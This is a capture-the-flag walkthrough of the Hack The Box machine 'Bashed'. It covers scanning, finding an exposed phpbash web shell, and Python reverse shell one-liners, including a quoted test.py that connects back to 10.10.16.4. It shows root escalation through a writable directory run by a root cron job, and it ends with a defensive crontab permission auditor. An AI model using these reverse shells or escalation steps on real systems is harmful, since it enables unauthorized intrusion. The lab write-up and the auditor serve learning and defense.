# Bashed

### Port Checking

```bash
naabu -host bashed.htb -v

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[DBG] Using host 10.10.10.68 for enumeration
[INF] Found 1 ports on host bashed.htb (10.10.10.68)
bashed.htb:80
```

**Open ports:**

* port 80 (HTTP)

Visiting the webpage presents us with phpbash. After some googling and poking around it turns out phpbash is a web shell, so the developer may have left it somewhere on the site, which would hand us remote command execution.

### Directory Fuzzing

```bash
dirb http://bashed.htb

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 24 05:37:07 2023
URL_BASE: http://bashed.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://bashed.htb/ ----
==> DIRECTORY: http://bashed.htb/css/                                                                                                                                      
==> DIRECTORY: http://bashed.htb/dev/                                                                                                                                      
==> DIRECTORY: http://bashed.htb/fonts/                                                                                                                                    
==> DIRECTORY: http://bashed.htb/images/                                                                                                                                   
+ http://bashed.htb/index.html (CODE:200|SIZE:7743)                                                                                                                        
==> DIRECTORY: http://bashed.htb/js/                                                                                                                                       
==> DIRECTORY: http://bashed.htb/php/                                                                                                                                      
+ http://bashed.htb/server-status (CODE:403|SIZE:298)                                                                                                                      
==> DIRECTORY: http://bashed.htb/uploads/ 
```

`/dev` seems sus. Visiting it shows two PHP files:

```text
phpbash.php
phpbash.min.php
```

### Foothold

Multiple reverse shell attempts were made; this one works when run from the phpbash shell (replace `YOUR_IP` with the listener address and start `nc -nvlp 4567` first):

```bash
export RHOST="YOUR_IP";export RPORT=4567;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

**Get Stable Shell**

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# press CTRL + Z to background the shell
stty raw -echo; fg
# press ENTER to get the shell back
```

Initial checks as `www-data`:

```bash
id
sudo -l

Matching Defaults entries for www-data on bashed:
   env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
   (scriptmanager : scriptmanager) NOPASSWD: ALL

```

### Priv Esc

Cool, `www-data` can run any command as `scriptmanager` without a password:

```bash
sudo -u scriptmanager /bin/bash
```

`config.php` was also checked for credentials:

```php
cat config.php 
<?php

//SITE GLOBAL CONFIGURATION
$email = "yourmail@here.com";   //<-- Your email

?>
```

* No credentials found, sadly

`/scripts` was found in the filesystem root, owned and writable by `scriptmanager`:

```bash
drwxrwxr--   2 scriptmanager scriptmanager  4096 Aug 23 08:29 scripts
```

Contents of the folder

```bash
-rw-r--r-- 1 scriptmanager scriptmanager 218 Aug 23 08:29 test.py
-rw-r--r-- 1 root          root           12 Aug 23 08:29 test.txt
```

* At first glance it looks like the script is run automatically and its output written to `test.txt`; since `test.txt` is owned by root, whatever runs `test.py` is running as root

Content of test.py

```python
# reverse shell left behind by a previous run: connects back to 10.10.16.4:1234
# and attaches an interactive /bin/sh to the socket
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.16.4",1234));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
```

* File content is literally a reverse shell

Change the IP to ours (the file is writable by `scriptmanager`) and open a listener:

```bash
nano test.py

s.connect(("YOUR_IP",1234));os.dup2(s.fileno(),0);
```

Wait up to a minute and voilà:

```bash
nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.10.x.x] from (UNKNOWN) [10.10.10.68] 38206
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
```

Crontab (checked as root):

```bash
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done
```

* The crontab confirms a root cron job that runs every `.py` file in `/scripts` once a minute; because the directory is writable by `scriptmanager`, any `.py` dropped there runs as root
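
The root cause here is a root cron job that executes a directory a lower-privileged user can write to. The following is an added example (not code from the box or the original writeup) of a small auditor that parses crontab lines, pulls out the absolute paths each command references, and flags any that are owned by, group-writable by, or world-writable for someone other than root. The sample crontab and the fake filesystem are constructed for the example; the `/scripts` entry mirrors the ownership and `drwxrwxr--` mode seen above. The stat backend is pluggable so the same logic can be pointed at a live host with `os.stat`.

```python
import os
import re
import stat

# Absolute paths mentioned in a cron command (cd targets, script names, arguments).
PATH_RE = re.compile(r'(?<![\w-])(/[^\s;|&"\'<>()]+)')


def parse_crontab_line(line):
    """Split one crontab line into (schedule, command); None for blanks, comments, env lines."""
    line = line.strip()
    if not line or line.startswith('#') or re.match(r'^\w+=', line):
        return None
    if line.startswith('@'):               # @reboot, @daily, ...
        fields = line.split(None, 1)
        return (fields[0], fields[1]) if len(fields) == 2 else None
    fields = line.split(None, 5)           # m h dom mon dow command
    if len(fields) < 6:
        return None
    return ' '.join(fields[:5]), fields[5]


def referenced_paths(command):
    """Absolute paths a command touches, e.g. 'cd /scripts; ...' -> ['/scripts']."""
    return sorted(set(PATH_RE.findall(command)))


def untrusted_write_reasons(mode, uid, gid, trusted_uids=(0,), trusted_gids=(0,)):
    """Reasons a path with this mode/ownership can be altered by a non-trusted user."""
    reasons = []
    if uid not in trusted_uids:
        reasons.append('owned by untrusted uid %d' % uid)
    if mode & stat.S_IWGRP and gid not in trusted_gids:
        reasons.append('group-writable by untrusted gid %d' % gid)
    if mode & stat.S_IWOTH:
        reasons.append('world-writable')
    return reasons


def audit_crontab(crontab_text, stat_fn):
    """stat_fn(path) -> (mode, uid, gid) or None if the path is missing.

    Returns one finding per (path, reason) for every command in the crontab.
    A writable directory is reported even if the existing script is fine: the
    glob in 'for f in *.py' executes anything dropped into it.
    """
    findings = []
    for line in crontab_text.splitlines():
        parsed = parse_crontab_line(line)
        if parsed is None:
            continue
        schedule, command = parsed
        for path in referenced_paths(command):
            info = stat_fn(path)
            if info is None:
                continue
            for reason in untrusted_write_reasons(*info):
                findings.append({'schedule': schedule, 'command': command,
                                 'path': path, 'reason': reason})
    return findings


def os_stat(path):
    """Live-host backend: read mode/uid/gid from the real filesystem."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return (st.st_mode, st.st_uid, st.st_gid)


# Constructed sample: a root crontab plus a fake filesystem (mode, uid, gid).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
* * * * * cd /scripts; for f in *.py; do python "$f"; done
0 3 * * * /usr/bin/updatedb
@reboot /opt/startup/run.sh
"""

FAKE_FS = {
    '/scripts': (stat.S_IFDIR | 0o774, 1001, 1001),      # drwxrwxr-- scriptmanager:scriptmanager
    '/usr/bin/updatedb': (stat.S_IFREG | 0o755, 0, 0),   # root-owned, not writable by others
    '/opt/startup/run.sh': (stat.S_IFREG | 0o777, 0, 0), # root-owned but world-writable
}


def audit_sample():
    """Run the auditor over the constructed crontab and fake filesystem."""
    return audit_crontab(SAMPLE_CRONTAB, FAKE_FS.get)


if __name__ == '__main__':
    for f in audit_sample():
        print("[%s] %s: %s  <- %s" % (f['schedule'], f['path'], f['reason'], f['command']))
```

On a real host, swap `FAKE_FS.get` for `os_stat` and feed it the output of `crontab -l` (or the contents of `/etc/crontab` and `/etc/cron.d/*`). The `/scripts` entry is flagged twice, once for the non-root owner and once for the non-root writable group, which is exactly the combination that let `scriptmanager` get root here; a root-owned but world-writable script is caught by the same check.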

